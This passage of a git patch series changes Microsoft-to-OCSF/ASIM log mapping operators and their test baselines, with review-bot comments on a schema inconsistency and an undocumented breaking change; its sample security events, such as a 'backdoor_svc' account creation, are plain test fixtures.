@@ -16,23 +26,120 @@ GroupName: null, GroupId: null, GroupIdType: null, + SrcIpAddr: null, + SrcHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, + }, + name: "asim.user_management", } { - name: "asim.user_management", - EventSchema: "UserManagement", - EventSchemaVersion: "0.1.2", - EventType: "UserAddedToGroup", - EventResult: "NA", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:57Z, + EventEndTime: 2024-03-23T12:34:57Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98776", + EventUid: "98776", EventOriginalType: "4728", + EventSeverity: "Informational", + EventResult: "NA", + Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", + DvcFQDN: "DC01.corp.local", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + EventType: "UserAddedToGroup", TargetUsername: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", - TargetUsernameType: null, TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", TargetUserIdType: "SID", GroupName: "DomainAdmins", GroupId: 
"S-1-5-21-3107921522-2185401913-891411500-512", GroupIdType: "SID", + SrcIpAddr: null, + SrcHostname: null, + AdditionalFields: { + activity_id: 3, + activity_name: "Add User", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3006, + class_name: "Group Management", + type_uid: 300603, + type_name: "Group Management: Add User", + time: 2024-03-23T12:34:57Z, + severity_id: 1, + metadata: { + event_code: "4728", + original_event_uid: "98776", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + group: { + domain: "CORP", + name: "DomainAdmins", + uid: "S-1-5-21-3107921522-2185401913-891411500-512", + }, + user: { + name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, + }, + name: "asim.user_management", } From 6f2b3931b915672c0881e46df9e4cfef5f80b19f Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:18:33 +0200 Subject: [PATCH 15/27] Remove raw mapper arguments Drop the raw-data side channel from the Microsoft OCSF and ASIM mapper UDOs. The mappers now use only the current event as their input, avoiding deferred argument semantics around moved fields. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/map.tql | 9 ++------- microsoft/operators/asim/ocsf/map.tql | 10 ---------- microsoft/operators/graph/ocsf/map.tql | 10 ---------- microsoft/operators/ocsf/map.tql | 9 ++------- .../windows/ocsf/events/powershell_module_logging.tql | 5 ++--- .../windows/ocsf/events/powershell_script_block.tql | 6 +++--- .../windows/ocsf/events/scheduled_task_create.tql | 2 +- microsoft/operators/windows/ocsf/map.tql | 9 --------- 8 files changed, 10 insertions(+), 50 deletions(-) 
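Review bot: The two `asim.user_management` records now differ in shape: the first carries `TargetUsernameType: "Windows"` while the second loses the field entirely (the removed `- TargetUsernameType: null,` has no new-side counterpart), so consumers of one stream see a heterogeneous schema. The second record's `TargetUsername` is a distinguished name, `CN=backdoor_svc,CN=Users,DC=corp,DC=local`, and ASIM's UsernameType enumeration includes `DN`; if the mapper can recognize that form, emitting `TargetUsernameType: "DN"` would make the baseline both complete and uniform. If leaving the type unset for group-management targets is deliberate, a short comment in the mapper (outside this hunk) saying so would keep the next reader from treating it as a gap.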
diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 42fafb5..9b4de4f 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,16 +1,11 @@ --- description: Maps supported Microsoft events to Microsoft Sentinel ASIM. -args: - named: - - name: raw - description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. - default: null --- if class_uid? == null { - microsoft::ocsf::map raw=$raw + microsoft::ocsf::map ocsf::derive ocsf::cast } -microsoft::asim::ocsf::map $raw +microsoft::asim::ocsf::map diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index f9ffffb..f9025c4 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -1,17 +1,7 @@ --- description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM. -args: - positional: - - name: raw - description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. - default: null --- -if $raw != null { - raw_data = $raw - raw_data_size = $raw.length_bytes() -} - match class_uid { 2003 => { microsoft::asim::ocsf::compliance_finding diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 84872d0..b8506f5 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -1,19 +1,9 @@ --- description: Microsoft Graph → OCSF -args: - named: - - name: raw - description: Raw Microsoft Graph event to preserve in OCSF `raw_data`. - default: null --- this = {graph: this, ocsf: {}} -if $raw != null { - ocsf.raw_data = $raw - ocsf.raw_data_size = $raw.length_bytes() -} - ocsf.cloud = { provider: "Azure", } diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index 004d099..5208749 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql 
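Review bot: Dropping the `raw` argument from `microsoft::asim::map`, `microsoft::asim::ocsf::map` and `microsoft::graph::ocsf::map` here (and from `microsoft::ocsf::map` and `microsoft::windows::ocsf::map` in the following hunks) is a breaking interface change that also removes `raw_data`/`raw_data_size` from the emitted OCSF records, yet the commit's diffstat lists no changelog entry and the surviving `description:` front matter says nothing about it. Callers that still pass `raw=` will presumably fail at load time, and consumers that used `raw_data` as the verbatim evidence copy of the source event (the PowerShell and scheduled-task comments rewritten later in this patch used to point them there) now only get what `unmapped` retains. Suggest a changelog entry plus one sentence in each affected UDO's front matter, e.g. `description: Maps supported Microsoft events to Microsoft Sentinel ASIM. The original event is not retained in raw_data; preserve it upstream if needed.` The `match class_uid` body of `microsoft::asim::ocsf::map` continues outside the hunk.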
@@ -1,14 +1,9 @@ --- description: Maps supported Microsoft events to OCSF. -args: - named: - - name: raw - description: Raw Microsoft event to preserve in OCSF `raw_data`. - default: null --- if @name == "microsoft.windows.eventlog" or System? != null { - microsoft::windows::ocsf::map raw=$raw + microsoft::windows::ocsf::map } else { - microsoft::graph::ocsf::map raw=$raw + microsoft::graph::ocsf::map } diff --git a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql index 598ea57..0e773a1 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql @@ -17,8 +17,7 @@ ocsf.script = { } // Payload contains the command invocation and parameter bindings as plain text; -// preserve verbatim in unmapped — parsing it would require regex surgery and -// the raw content is already in raw_data. +// preserve verbatim in unmapped because parsing it would require regex surgery. // // ContextInfo is a multi-line key=value block with host, engine, runspace, -// pipeline, user, and shell info; also left in unmapped for the same reason. +// pipeline, user, and shell info; also left in unmapped. diff --git a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql index cbc7c2e..d7db994 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql 
@@ -29,6 +29,6 @@ if windows.EventData.Path? != null and windows.EventData.Path? != "" { ocsf.script.name = ocsf.script.file.name } -// ScriptBlockText is the raw script content — potentially large and already -// preserved verbatim in raw_data. MessageNumber/MessageTotal indicate chunked -// multi-part blocks. Both stay in unmapped for downstream consumers. +// ScriptBlockText is the raw script content and can be large. +// MessageNumber/MessageTotal indicate chunked multi-part blocks. +// These fields stay in unmapped for downstream consumers. diff --git a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql index 65bf34a..9c6c4f0 100644 --- a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql +++ b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql @@ -30,6 +30,6 @@ ocsf.job = { // TaskContent is an XML string describing triggers and actions. It is // intentionally left in unmapped — parsing it would require an XML operator -// and the content is already preserved verbatim in raw_data. +// and downstream consumers can parse it if needed. // ClientProcessStartKey, ParentProcessId, RpcCallClientLocality, FQDN also // remain in unmapped. diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 33c3f9b..ef62c4b 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -1,17 +1,8 @@ --- description: Structured Microsoft Windows Event Log → OCSF -args: - named: - - name: raw - description: Raw Windows Event Log XML to preserve in OCSF `raw_data`. - default: null --- this = {windows: this, ocsf: {}} -if $raw != null { - ocsf.raw_data = $raw - ocsf.raw_data_size = $raw.length_bytes() -} ocsf.metadata = { event_code: windows.System.EventID.string(), From d81cdcdb1000d64b520de94c8bf00de79a3894f9 Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:22:44 +0200 Subject: [PATCH 16/27] Align ASIM OCSF tests Move the Microsoft OCSF-to-ASIM tests under the ASIM OCSF test tree so their layout mirrors the operator package. Split the broad user-management and direct-target cases into per-operator baselines. Assisted-by: GPT-5 (Codex) --- .../ocsf/account_change.tql} | 1 + microsoft/tests/asim/ocsf/account_change.txt | 71 ++++ .../ocsf}/authentication.tql | 0 .../ocsf}/authentication.txt | 0 .../ocsf/detection_finding.tql} | 0 .../ocsf/detection_finding.txt} | 0 .../ocsf/dhcp_activity.tql} | 1 + microsoft/tests/asim/ocsf/dhcp_activity.txt | 49 +++ microsoft/tests/asim/ocsf/dns_activity.tql | 188 ++++++++++ microsoft/tests/asim/ocsf/dns_activity.txt | 59 +++ .../ocsf/event_log_activity.tql} | 0 .../ocsf/event_log_activity.txt} | 0 .../tests/asim/ocsf/file_system_activity.tql | 188 ++++++++++ .../tests/asim/ocsf/file_system_activity.txt | 117 ++++++ .../tests/asim/ocsf/group_management.tql | 82 +++++ .../ocsf/group_management.txt} | 71 ---- microsoft/tests/asim/ocsf/http_activity.tql | 188 ++++++++++ microsoft/tests/asim/ocsf/http_activity.txt | 53 +++ .../ocsf/map.tql} | 0 .../ocsf/map.txt} | 0 .../tests/asim/ocsf/network_activity.tql | 188 ++++++++++ .../tests/asim/ocsf/network_activity.txt | 61 ++++ .../ocsf/process_activity.tql} | 0 .../ocsf/process_activity.txt} | 0 .../tests/ocsf-to-asim/direct-targets.txt | 339 ------------------ 25 files changed, 1246 insertions(+), 410 deletions(-) rename microsoft/tests/{ocsf-to-asim/user-management.tql => asim/ocsf/account_change.tql} (98%) create mode 100644 microsoft/tests/asim/ocsf/account_change.txt rename microsoft/tests/{ocsf-to-asim => asim/ocsf}/authentication.tql (100%) rename microsoft/tests/{ocsf-to-asim => asim/ocsf}/authentication.txt (100%) rename microsoft/tests/{ocsf-to-asim/alert.tql => asim/ocsf/detection_finding.tql} (100%) rename microsoft/tests/{ocsf-to-asim/alert.txt => asim/ocsf/detection_finding.txt} 
(100%) rename microsoft/tests/{ocsf-to-asim/direct-targets.tql => asim/ocsf/dhcp_activity.tql} (99%) create mode 100644 microsoft/tests/asim/ocsf/dhcp_activity.txt create mode 100644 microsoft/tests/asim/ocsf/dns_activity.tql create mode 100644 microsoft/tests/asim/ocsf/dns_activity.txt rename microsoft/tests/{ocsf-to-asim/audit.tql => asim/ocsf/event_log_activity.tql} (100%) rename microsoft/tests/{ocsf-to-asim/audit.txt => asim/ocsf/event_log_activity.txt} (100%) create mode 100644 microsoft/tests/asim/ocsf/file_system_activity.tql create mode 100644 microsoft/tests/asim/ocsf/file_system_activity.txt create mode 100644 microsoft/tests/asim/ocsf/group_management.tql rename microsoft/tests/{ocsf-to-asim/user-management.txt => asim/ocsf/group_management.txt} (52%) create mode 100644 microsoft/tests/asim/ocsf/http_activity.tql create mode 100644 microsoft/tests/asim/ocsf/http_activity.txt rename microsoft/tests/{ocsf-to-asim/unsupported-strict.tql => asim/ocsf/map.tql} (100%) rename microsoft/tests/{ocsf-to-asim/unsupported-strict.txt => asim/ocsf/map.txt} (100%) create mode 100644 microsoft/tests/asim/ocsf/network_activity.tql create mode 100644 microsoft/tests/asim/ocsf/network_activity.txt rename microsoft/tests/{ocsf-to-asim/process.tql => asim/ocsf/process_activity.tql} (100%) rename microsoft/tests/{ocsf-to-asim/process.txt => asim/ocsf/process_activity.txt} (100%) delete mode 100644 microsoft/tests/ocsf-to-asim/direct-targets.txt diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/asim/ocsf/account_change.tql similarity index 98% rename from microsoft/tests/ocsf-to-asim/user-management.tql rename to microsoft/tests/asim/ocsf/account_change.tql index 02832f6..64b9b0a 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -76,6 +76,7 @@ from { }, } @name = "ocsf.account_change" +where class_uid == 3001 microsoft::asim::ocsf::map name = @name sort EventOriginalType 
diff --git a/microsoft/tests/asim/ocsf/account_change.txt b/microsoft/tests/asim/ocsf/account_change.txt new file mode 100644 index 0000000..c1220d0 --- /dev/null +++ b/microsoft/tests/asim/ocsf/account_change.txt 
@@ -0,0 +1,71 @@ +{ + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98767", + EventUid: "98767", + EventOriginalType: "4720", + EventSeverity: "Informational", + EventResult: "NA", + Dvc: "DC01.corp.local", + DvcHostname: "DC01.corp.local", + DvcFQDN: "DC01.corp.local", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + EventType: "UserCreated", + TargetUsername: "CORP\\backdoor_svc", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", + TargetUserIdType: "SID", + GroupName: null, + GroupId: null, + GroupIdType: null, + SrcIpAddr: null, + SrcHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, + }, + name: "asim.user_management", +} 
diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/authentication.tql rename to microsoft/tests/asim/ocsf/authentication.tql diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/asim/ocsf/authentication.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/authentication.txt rename to microsoft/tests/asim/ocsf/authentication.txt diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/asim/ocsf/detection_finding.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/alert.tql rename to microsoft/tests/asim/ocsf/detection_finding.tql diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/asim/ocsf/detection_finding.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/alert.txt rename to microsoft/tests/asim/ocsf/detection_finding.txt diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql similarity index 99% rename from microsoft/tests/ocsf-to-asim/direct-targets.tql rename to microsoft/tests/asim/ocsf/dhcp_activity.tql index aaecf95..c1e5d1f 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -182,6 +182,7 @@ from { code: 200, }, } +where class_uid == 4004 microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.txt b/microsoft/tests/asim/ocsf/dhcp_activity.txt new file mode 100644 index 0000000..180e62e --- /dev/null +++ b/microsoft/tests/asim/ocsf/dhcp_activity.txt 
@@ -0,0 +1,49 @@ +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:03Z, + EventEndTime: 2026-01-01T00:00:03Z, + EventProduct: "DHCP", + EventVendor: "Microsoft", + EventOriginalUid: "dhcp-1", + EventUid: "dhcp-1", + EventOriginalType: "400405", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "dhcp1", + DvcHostname: "dhcp1", + DvcFQDN: "dhcp1", + EventSchema: "DhcpEvent", + EventSchemaVersion: "0.1.1", + EventType: "Assign", + SrcHostname: "client1", + SrcIpAddr: 10.0.0.50, + SrcMacAddr: "00:11:22:33:44:55", + AdditionalFields: { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, + }, + name: "asim.dhcp_event", +} diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql new file mode 100644 index 0000000..2f140d1 --- /dev/null +++ b/microsoft/tests/asim/ocsf/dns_activity.tql 
@@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + 
version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 4003 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.txt b/microsoft/tests/asim/ocsf/dns_activity.txt new file mode 100644 index 0000000..6d4567a --- /dev/null +++ b/microsoft/tests/asim/ocsf/dns_activity.txt 
@@ -0,0 +1,59 @@
+{
+ EventCount: 1,
+ EventStartTime: 2026-01-01T00:00:02Z,
+ EventEndTime: 2026-01-01T00:00:02Z,
+ EventProduct: "DNS",
+ EventVendor: "Microsoft",
+ EventOriginalUid: "dns-1",
+ EventUid: "dns-1",
+ EventOriginalType: "400301",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "dns1",
+ DvcHostname: "dns1",
+ DvcFQDN: "dns1",
+ EventSchema: "Dns",
+ EventSchemaVersion: "0.1.7",
+ EventType: "Query",
+ EventSubType: "request",
+ DnsQuery: "example.org",
+ DnsQueryTypeName: "A",
+ DnsQueryClassName: "IN",
+ EventResultDetails: "NA",
+ SrcIpAddr: 10.0.0.1,
+ SrcHostname: null,
+ DstIpAddr: null,
+ DstHostname: null,
+ AdditionalFields: {
+ activity_id: 1,
+ activity_name: "Query",
+ category_uid: 4,
+ class_uid: 4003,
+ class_name: "DNS Activity",
+ type_uid: 400301,
+ time: 2026-01-01T00:00:02Z,
+ severity_id: 1,
+ status: "Success",
+ rcode: "NA",
+ metadata: {
+ original_event_uid: "dns-1",
+ product: {
+ name: "DNS",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "dns1",
+ },
+ query: {
+ hostname: "example.org",
+ type: "A",
+ class: "IN",
+ },
+ src_endpoint: {
+ ip: 10.0.0.1,
+ },
+ },
+ name: "asim.dns",
+}
diff --git a/microsoft/tests/ocsf-to-asim/audit.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql
similarity index 100%
rename from microsoft/tests/ocsf-to-asim/audit.tql
rename to microsoft/tests/asim/ocsf/event_log_activity.tql
diff --git a/microsoft/tests/ocsf-to-asim/audit.txt b/microsoft/tests/asim/ocsf/event_log_activity.txt
similarity index 100%
rename from microsoft/tests/ocsf-to-asim/audit.txt
rename to microsoft/tests/asim/ocsf/event_log_activity.txt
diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql
new file mode 100644
index 0000000..71badea
--- /dev/null
+++ b/microsoft/tests/asim/ocsf/file_system_activity.tql
@@ -0,0 +1,188 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, +}, { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, +}, { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + 
version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, +}, { + activity_id: 5, + activity_name: "Ack", + category_uid: 4, + class_uid: 4004, + class_name: "DHCP Activity", + type_uid: 400405, + time: 2026-01-01T00:00:03Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "dhcp-1", + product: { + name: "DHCP", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, +} +where class_uid == 1001 +microsoft::asim::ocsf::map +name = @name +sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/file_system_activity.txt b/microsoft/tests/asim/ocsf/file_system_activity.txt new file mode 100644 index 0000000..cf45713 --- /dev/null +++ b/microsoft/tests/asim/ocsf/file_system_activity.txt 
@@ -0,0 +1,117 @@
+{
+ EventCount: 1,
+ EventStartTime: 2026-01-01T00:00:00Z,
+ EventEndTime: 2026-01-01T00:00:00Z,
+ EventProduct: "Endpoint",
+ EventVendor: "Microsoft",
+ EventOriginalUid: "file-1",
+ EventUid: "file-1",
+ EventOriginalType: "100101",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "host1",
+ DvcHostname: "host1",
+ DvcFQDN: "host1",
+ EventSchema: "FileEvent",
+ EventSchemaVersion: "0.2.2",
+ EventType: "FileCreated",
+ ActorUsername: "alice",
+ ActorUserId: null,
+ TargetFilePath: "C:\\tmp\\payload.exe",
+ TargetFileName: "payload.exe",
+ TargetFilePathType: "Windows Local",
+ AdditionalFields: {
+ activity_id: 1,
+ activity_name: "Create",
+ category_uid: 1,
+ class_uid: 1001,
+ class_name: "File System Activity",
+ type_uid: 100101,
+ time: 2026-01-01T00:00:00Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "file-1",
+ product: {
+ name: "Endpoint",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "host1",
+ },
+ actor: {
+ user: {
+ name: "alice",
+ },
+ },
+ file: {
+ path: "C:\\tmp\\payload.exe",
+ name: "payload.exe",
+ },
+ },
+ name: "asim.file_event",
+}
+{
+ EventCount: 1,
+ EventStartTime: 2026-01-01T00:00:05Z,
+ EventEndTime: 2026-01-01T00:00:05Z,
+ EventProduct: "Endpoint",
+ EventVendor: "Microsoft",
+ EventOriginalUid: "file-2",
+ EventUid: "file-2",
+ EventOriginalType: "100105",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "host1",
